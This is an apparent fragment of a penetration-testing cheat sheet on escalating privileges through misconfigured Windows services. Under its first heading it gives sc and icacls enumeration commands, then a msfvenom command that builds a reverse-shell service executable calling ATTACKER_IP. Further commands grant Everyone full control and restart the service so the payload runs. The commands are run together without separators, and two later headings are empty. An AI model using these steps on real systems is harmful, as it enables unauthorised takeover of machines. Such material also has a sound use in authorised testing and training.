Windows Services
Service Configuration Basics
HKLM\SYSTEM\CurrentControlSet\Services\sc query
1. Insecure Permissions on Service Executable
sc qc <SERVICE_NAME>icacls <EXECUTABLE_PATH>msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4445 -f exe-service -o <SERVICE_EXECUTABLE>icacls <SERVICE_EXECUTABLE> /grant Everyone:Fsc stop <SERVICE_NAME> sc start <SERVICE_NAME>
2. Unquoted Service Path Vulnerability
3. Insecure Service Permissions
Last updated